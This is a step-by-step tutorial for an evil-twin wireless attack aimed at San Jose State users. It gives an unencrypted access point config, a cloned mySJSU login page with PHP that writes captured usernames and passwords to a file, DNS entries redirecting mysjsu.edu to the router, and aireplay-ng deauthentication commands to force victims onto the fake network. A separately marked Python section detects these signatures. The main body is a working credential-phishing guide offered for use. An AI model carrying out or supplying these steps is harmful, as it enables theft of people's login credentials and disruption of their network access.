Router in the Middle Attack

  1. Set-up Wireless Access Point
  2. Host malicious website clone on AP
  3. Create DHCP entry for malicious Website
  4. Deauthenticate Users
  5. Hope for success. Else try again.
  6. Comments and future development

The wireless Access Point I am using is an Onion Omega running a slightly modified version of OpenWRT.

1. Setting up the Wireless Access Point

In this case I will be creating an Access Point pretending to be part of a San Jose State wireless network. First we need to figure out what name our wireless network should have. We will not be using any encryption to secure our AP because we want to lure as many people as possible into the honeypot AP.

This is the configuration of the wireless setup.

/etc/config/wireless

config wifi-device 'radio0'
option type 'mac80211'
option hwmode '11g'
option path 'platform/ar933x_wmac'
option htmode 'HT20'
option disabled '0'
option channel '9'
option txpower '30'
option country 'US'

config wifi-iface
option device 'radio0'
option network 'wifi'
option mode 'ap'
option encryption 'none'
option ssid 'not SJSU_premier'

2. Hosting a malicious website clone on the AP

Pick a website that you want to clone and copy its source code. The easiest way of doing this is finding a website that uses an HTML form for submission and changing the location that is opened by the form on submission. "saveUserData.php" is the file that I created to save the user information.

Snippet from index.html showing the opening tag of the form used for the username and password.

<form action="saveUserData.php" method="post" id="login" name="login" autocomplete=off onSubmit="signin(document.login)">

I chose the school’s mySJSU Portal to clone.

Figure: fake mySJSU Portal running locally from PHPStorm

This is the PHP code from the saveUserData.php file.

<?php
// Read the two fields posted by the cloned login form
$name = filter_input(INPUT_POST, "userid");
$password = filter_input(INPUT_POST, "pwd");
// Append both values to a text file next to the script
$myFile = "UserData.txt";
$fh = fopen($myFile, 'a') or die("can't open file");
$stringData = "Username: $name\n";
fwrite($fh, $stringData);
$stringData = "Password: $password\n";
fwrite($fh, $stringData);
fclose($fh);

All it does is take the username and the password and write them to a text file.

On the Onion Omega you need to install uhttpd as the server using opkg and configure the location of the files for the webserver so that anyone connecting to the IP Address of your router will see your malicious website.

Install PHP5, uhttpd and git on your Omega.

This is the /etc/config/uhttpd file.

config uhttpd 'main'
list listen_http '0.0.0.0:80'
list listen_http '[::]:80'
list listen_https '0.0.0.0:443'
list listen_https '[::]:443'
list interpreter ".php=/usr/bin/php-cgi"
option redirect_https '1'
option home '/www/fakeMySJSU'
option rfc1918_filter '1'
option max_requests '3'
option max_connections '100'
option cert '/etc/uhttpd.crt'
option key '/etc/uhttpd.key'
option cgi_prefix '/cgi-bin'
option script_timeout '60'
option network_timeout '30'
option http_keepalive '20'
option tcp_keepalive '1'
option ubus_prefix '/ubus'

config cert 'px5g'
option days '730'
option bits '1024'
option country 'ZZ'
option state 'Somewhere'
option location 'Uknown'
option commonname 'OpenWrt'

The interpreter line (list interpreter ".php=/usr/bin/php-cgi") is the PHP configuration: it tells uhttpd to hand .php files to php-cgi.

The home line (option home '/www/fakeMySJSU') is the location of your website on the Onion Omega.

You should now be able to connect to your access point and view the website you created by going to the IP address of your router.

If you don’t know the IP Address check the /etc/config/network file.

...
config interface 'wifi'
option proto 'static'
option ipaddr '192.168.3.1'
option netmask '255.255.255.0'
...

3. Create DHCP entry for malicious Website

I added the domain name I want users to try to connect to in my /etc/config/dhcp file and gave it the IP of the router.

config domain
option name 'mysjsu.edu'
option ip '192.168.3.1'

config domain
option name 'www.mysjsu.edu'
option ip '192.168.3.1'

4. Deauthenticating Users

Since you need people to connect to your wireless network for this scheme to work, you’ll need to deauthenticate them from their network.

We will do this using airmon-ng, airodump-ng and aireplay-ng.

1. Set your wireless interface to monitor mode using:

sudo airmon-ng start wlan0

2. Now we will need to monitor the wireless traffic to figure out the MAC address of the routers.

sudo airodump-ng wlan0mon

3. Pick a router to send the deauth packets from and monitor only that MAC address.

sudo airodump-ng --channel 11 --bssid 58:F3:9C:D0:21:50 wlan0mon

4. Now pick a client of the AP that you want to deauthenticate.

sudo aireplay-ng --deauth 1000 -a 58:F3:9C:D0:21:50 -c 84:38:35:48:9F:12 wlan0mon

5. Hope for success. Else try again

With some luck and a lot of deauths sent, your chances of luring someone into your honeypot are increased.
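As an added defensive example, not part of the original write-up: the three signatures this setup leaves on the air and on the wire (an open lookalike SSID beside a known encrypted one, a deauth flood aimed at one client, and a public hostname resolving to the gateway's RFC 1918 address) checked over constructed sample records. The second BSSID, the sample DNS answers and the flood threshold are assumptions; only the first BSSID, the client MAC, the SSIDs and 192.168.3.1 come from the write-up.

```python
import ipaddress
from collections import Counter

# Constructed scanner output. 58:F3:9C:D0:21:50 and the client MAC come from the
# write-up; 40:A3:6B:C1:22:33 is a made-up BSSID standing in for the rogue AP.
FRAMES = [
    {"type": "beacon", "bssid": "58:F3:9C:D0:21:50", "ssid": "SJSU_premier", "enc": "WPA2"},
    {"type": "beacon", "bssid": "40:A3:6B:C1:22:33", "ssid": "not SJSU_premier", "enc": "none"},
    {"type": "beacon", "bssid": "40:A3:6B:C1:22:33", "ssid": "SJSU_premier", "enc": "none"},
] + [{"type": "deauth", "bssid": "58:F3:9C:D0:21:50", "client": "84:38:35:48:9F:12"}] * 40

# SSIDs the organisation actually operates, with the encryption they should use.
KNOWN_NETWORKS = {"SJSU_premier": "WPA2"}

# Constructed DNS answers as a client on the rogue AP would receive them
# (203.0.113.10 is a documentation address standing in for a real public host).
DNS_ANSWERS = {"www.mysjsu.edu": "192.168.3.1", "example.com": "203.0.113.10"}

RFC1918 = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def lookalike_open_aps(frames, known):
    """Open APs whose SSID equals or embeds a known SSID that should be encrypted.
    Catches both a duplicate-SSID evil twin and a lure like 'not SJSU_premier'."""
    hits = set()
    for f in frames:
        if f["type"] != "beacon" or f["enc"] != "none":
            continue
        if any(name.lower() in f["ssid"].lower() for name, enc in known.items() if enc != "none"):
            hits.add((f["bssid"], f["ssid"]))
    return sorted(hits)


def deauth_floods(frames, threshold=20):
    """(bssid, client) pairs that received at least `threshold` deauth frames;
    a few per session is normal, a burst of dozens or more is not."""
    counts = Counter((f["bssid"], f["client"]) for f in frames if f["type"] == "deauth")
    return {pair: n for pair, n in counts.items() if n >= threshold}


def private_answers_for_public_names(answers):
    """Hostnames the local resolver maps into RFC 1918 space, which is exactly
    what the dhcp 'domain' entries above produce for mysjsu.edu."""
    return {name: ip for name, ip in answers.items()
            if any(ipaddress.ip_address(ip) in net for net in RFC1918)}


if __name__ == "__main__":
    print(lookalike_open_aps(FRAMES, KNOWN_NETWORKS))
    print(deauth_floods(FRAMES))
    print(private_answers_for_public_names(DNS_ANSWERS))
```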

6. Comments and future development

This exact thing could have been done using facebook.com or google.com as an example. I will make another example in the future illustrating what that would look like.

Using a router to host a website can also be very beneficial when you want an online presence that requires users to have two-factor authentication: a traditional login as the first factor and physical location as the second. I will also illustrate this in the future.